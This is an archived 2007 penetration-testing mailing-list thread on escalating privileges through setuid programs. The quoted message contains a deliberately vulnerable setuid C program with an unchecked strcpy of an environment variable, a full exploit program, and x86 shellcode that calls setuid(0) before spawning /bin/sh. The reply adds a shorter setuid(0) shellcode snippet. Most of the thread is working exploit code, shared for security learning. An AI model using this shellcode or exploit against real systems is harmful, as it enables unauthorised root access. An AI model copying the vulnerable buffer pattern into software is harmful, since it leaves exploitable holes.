Home page logo
/

pen-test logo Penetration Testing mailing list archives

Re: question on escalating privileges via suid vulnerabilities
From: "John McGuire" <jmcguire81 () gmail com>
Date: Wed, 28 Feb 2007 12:20:43 -0700

Here is the assembly I finally came up with for this. It shaves off a
byte if space is critical:

//setuid(0), Opcode 17
"\x31\xdb"                      // xorl         %ebx,%ebx
"\x8d\x43\x17"                  // leal         0x17(%ebx),%eax  //eax
= ebx+0x17
"\xcd\x80"                      // int          $0x80


John



On 2/27/07, Fábio Russo <fabio.contin.russo () gmail com> wrote:

>Try with "setuid(0);" before execve :-)
>--
>Andrea "bunker" Purificato
>+++++++++++[>++++++>+++++++++++++++++++++++++++++++++>++++
>++++++<<<-]>.>++++++++++.>.<----------.>---------.<+++++++.
>
>http://rawlab.mindcreations.com

Hi.
Some applications need a setuid(0) before the /bin/sh string because
it have the suid bit set.
see the exemple below:

// buged program with setuid bit set and root privileges:


int main(int argc, char **argv) {
char env[96];

// Shows the return address for exploiting
printf("- %p -\n", &env);
strcpy(env,getenv("BOLINHA"));
return(0);

}



//exploit: usage ./exploit <bugged_program> <return addr>

extern char **environ;
char
shellcode[]="\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char **argv)
{
  char string_longa[128];
   long *ptr = (long *) string_longa;
  int i;

  for(i=0; i<32; i++) *(ptr + i) = (int) strtoul(argv[2],NULL,16);
  for(i=0; i<(int) strlen(shellcode); i++) string_longa[i]=shellcode[i];

  setenv("BOLINHA", string_longa, 1);
  execle(argv[1], argv[1], NULL, environ);
  printf("%s\n", string_longa);

  return (0);

}

Taking a close look into exploit source code we can see that
the firsts bytes in the shellcode are the setuid(0),
more preciselly the \x31\xc0\x31\xdb\xb0\x17\xcd\x80.
This is needed to get a root shell.
if you cut those bytes off from shellcode, you will get a shell
that belongs to the user who executed the exploit.

I hope it can be usefull for someone. -: )

bye.


------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.

http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------



------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.

http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------


  By Date           By Thread  

Current thread:
  • Re: question on escalating privileges via suid vulnerabilities John McGuire (Mar 01)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]